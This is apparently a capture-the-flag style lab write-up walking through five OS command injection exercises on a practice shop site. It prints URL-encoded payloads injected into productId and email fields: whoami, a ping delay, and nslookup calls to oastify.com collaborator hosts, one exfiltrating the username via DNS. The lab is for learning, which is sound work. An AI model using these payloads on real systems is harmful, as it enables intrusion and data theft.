1. Simple Command Injection
1.1 Achieve the Objective
Successfully executed 'whoami' to view the current user's name.
1.2 Attack Steps
Observing the page of this target field, it is found that this is a page displaying its product information, and clicking 'view details' can display the details of each product.
Go to a product detail page and find that the framed part is a function to check the product inventory.
Capture the packet and find that the productId and storeId parameters were passed.
Insert the payload into the productId
# payload
%26whoami%26
%26 is the URL encoding of & because in HTTP packets, the & symbol is used to separate different parameters. If & is used directly, it will be treated as a separator by the HTTP packet, so URL encoding is required. After the data is transmitted, it is decoded to make & effective.
In system commands, the & symbol is used to concatenate commands, so that the concatenated commands run separately.
2. Utilize time-delayed command blind injection
2.1 Achieve the Objective
Cause a 10-second delay using command blind injection.
2.2 Attack Steps
Go to the Submit feedback page, which is a page for submitting feedback to the website. Since user feedback needs to be submitted to the administrator, it is likely that the sendmail command is used. Use this command to send the user's name, email, and feedback information to the administrator's email. Because it is sending an email to the administrator, the website itself may not have an echo.
Capture the packet submitted for feedback and insert the payload into the email
# payload
%26ping -c10127.0.0.1%26
3. Utilize command blind injection with output redirection
3.1 Achieve the Objective
The target field has a writable folder: /var/www/images
Execute the whoami command, redirect its output to the folder below, and then search its content
3.2 Attack Steps
It's still the page for submitting feedback.
Capture the packet when submitting feedback and then input the payload in the email.
Observe the data packets on the main interface of the target field and find a path to load the image, which passes the filename parameter.
4. Utilize out-of-band channel technology for command blind injection
4.1 Achieve the Objective
Initiate a DNS query against burpsuite's collaborator using command blind injection.
4.2 Attack Steps
It's still the same page, let's get started.
Submit any test data on this page and then click Submit feedback to capture the packet.
Go to the collaborator in burpsuite and activate this feature.
This feature serves as a DNS query server, which can reveal vulnerabilities that cannot be directly detected through their response data in penetration testing. By using out-of-band technology, specifically by utilizing the collaborator feature integrated into the burpsutie software, vulnerabilities that are not visible through the response can be made apparent in this way. This feature is similar to dnslog.
Same as before, focus on the email parameter and insert the payload into this parameter.
# payload
%26nslookup%200no5vo9uebzjpzworih5vhzzyq4hs7gw.oastify.com%26
5. Obtain the system username using out-of-band channel technology
5.1 Achieve the Objective
Obtain the system username using out-of-band channel technology.
5.2 Attack Steps
Yes, that's right, it's still the same page.
Submit some test data arbitrarily, and then submit the feedback for packet capture.
Same as before, focus on the email parameter and insert the Payload.
# payload
%26nslookup%20`whoami`.wrr1zkdqi73ftv0kvel1zd3v2m8dw4kt.oastify.com%26
In this payload, the backtick symbol (``) located at the upper left corner of the keyboard (backquote), this symbol is applied in the system's shell, so the characters inside the symbol will be executed as commands.
Now, submit the username we have obtained in the button shown in the following figure.
评论已关闭